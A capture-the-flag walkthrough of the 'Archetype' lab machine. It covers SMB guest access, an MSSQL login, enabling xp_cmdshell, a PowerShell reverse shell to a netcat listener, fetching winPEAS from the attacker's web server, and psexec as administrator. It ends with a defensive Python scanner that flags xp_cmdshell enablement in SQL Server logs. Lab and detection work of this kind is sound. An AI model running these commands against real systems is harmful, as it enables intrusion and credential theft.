Archetype

Task 1

Which TCP port is hosting a database server?

Found with a regular port scan with service/version detection:

$ nmap -sV <ip>

Task 2

What is the name of the non-Administrative share available over SMB?

Found by listing shares over a null session (no credentials, i.e. guest access):

$ smbclient --no-pass -L //<ip>

Task 3

What is the password identified in the file on the SMB share?

First, we connect to the share, list its files, and fetch the one file present, which contains the password:

$ smbclient --no-pass //<ip>/<share>
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Jan 20 13:20:57 2020
  ..                                  D        0  Mon Jan 20 13:20:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 13:23:02 2020

                5056511 blocks of size 4096. 2572728 blocks available
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (2.9 KiloBytes/sec) (average 2.9 KiloBytes/sec)
smb: \> exit

Task 4

What script from the Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?

This is mssqlclient.py (packaged as impacket-mssqlclient on Kali), which we can use to connect to the SQL service identified in Task 1:

$ impacket-mssqlclient -windows-auth <domain>/<user>@<ip>

Task 5

What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?

This is xp_cmdshell. It is disabled by default, so 'show advanced options' and then 'xp_cmdshell' itself must be enabled with sp_configure (followed by RECONFIGURE) before it can be called:

SQL (<domain>\<user>  dbo@master)> xp_cmdshell "net user";
ERROR(<domain>): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL (<domain>\<user>  dbo@master)> EXEC sp_configure 'show advanced options', 1
INFO(<domain>): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (<domain>\<user>  dbo@master)> RECONFIGURE
SQL (<domain>\<user>  dbo@master)> EXEC sp_configure 'xp_cmdshell', 1
INFO(<domain>): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (<domain>\<user>  dbo@master)> RECONFIGURE

After this, we can execute operating-system commands through it:

SQL (<domain>\<user>  dbo@master)> EXEC xp_cmdshell 'whoami';
output
-----------------
<domain>\<user>

This can be used to obtain an interactive shell. First, set up a listener on the attacking machine:

$ nc -lvnp 4444

Generate a reverse-shell one-liner, e.g. the base64-encoded PowerShell variant from https://revshells.com, and run it through xp_cmdshell:

SQL (<domain>\<user>  dbo@master)> EXEC xp_cmdshell 'powershell.exe -e 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';

Verify the connection on the listener:

listening on [any] 4444 ...
connect to [10.10.14.145] from (UNKNOWN) [<ip>] <port>

PS C:\Windows\system32> whoami
<domain>\<user>
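Each sp_configure change in the sequence above is also written to the SQL Server ERRORLOG as a "Configuration option '...' changed from X to Y" line, which gives defenders a detection point for exactly this technique. As an added example, not part of the original writeup, a small Python scanner over a constructed ERRORLOG excerpt that flags xp_cmdshell (and similar OS-access options) being switched on, noting whether the same session first enabled 'show advanced options':

```python
import re

# Matches the line SQL Server writes to its ERRORLOG whenever sp_configure changes
# a setting, e.g. "... spid51  Configuration option 'xp_cmdshell' changed from 0 to 1. ..."
CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+"
    r"(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Server options whose enablement hands a SQL login a foothold on the host OS.
RISKY_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures", "clr enabled"}


def detect_risky_config_changes(lines):
    """Return one alert per risky option switched on (0 -> 1).

    'advanced_options_first' records whether the same session (spid) enabled
    'show advanced options' earlier in the log, the precursor step seen above.
    """
    alerts = []
    advanced_on = set()  # spids that have turned on 'show advanced options'
    for line in lines:
        m = CONFIG_CHANGE.match(line)
        if not m:
            continue
        option, new, spid = m["option"], int(m["new"]), m["spid"]
        if option == "show advanced options" and new == 1:
            advanced_on.add(spid)
        elif option in RISKY_OPTIONS and new == 1:
            alerts.append({
                "time": m["ts"],
                "spid": spid,
                "option": option,
                "advanced_options_first": spid in advanced_on,
            })
    return alerts


# Constructed ERRORLOG excerpt mirroring the sp_configure sequence above (not a real log).
SAMPLE_ERRORLOG = """\
2020-01-20 13:25:01.12 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2020-01-20 13:25:03.48 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2020-01-20 13:40:12.00 spid60      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

if __name__ == "__main__":
    for alert in detect_risky_config_changes(SAMPLE_ERRORLOG.splitlines()):
        print(alert)
```

Switching the option back off (the spid60 line) is deliberately not alerted on, so the scanner only surfaces the enablement that matters.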

Task 6

What script can be used in order to search possible paths to escalate privileges on Windows hosts?

This is winPEAS. First, I verified that I needed the x64 build (winPEASx64.exe) by quickly running systeminfo, which yielded:

PS C:\Users\<user>\Desktop> systeminfo

...
System Type:               x64-based PC
...

Fetching it straight from GitHub on the target did not seem to work, so I downloaded it to my own machine and served it from that folder with a simple web server:

$ python -m http.server

I could then fetch it from my machine onto the user's desktop and run it:

PS C:\Users\<user>\Desktop> wget http://<my ip>:8000/winPEASx64.exe -O winPEASx64.exe
PS C:\Users\<user>\Desktop> .\winPEASx64.exe

Task 7

What file contains the administrator's password?

The winPEAS output pointed to a PowerShell console history file that contained the administrator password in clear text.

Flags

The user flag was on the desktop of the service user. The root flag was obtained by authenticating as administrator with impacket-psexec, using the password from the PowerShell history file:

$ impacket-psexec administrator@<ip>

The root flag was then found on the administrator's desktop.
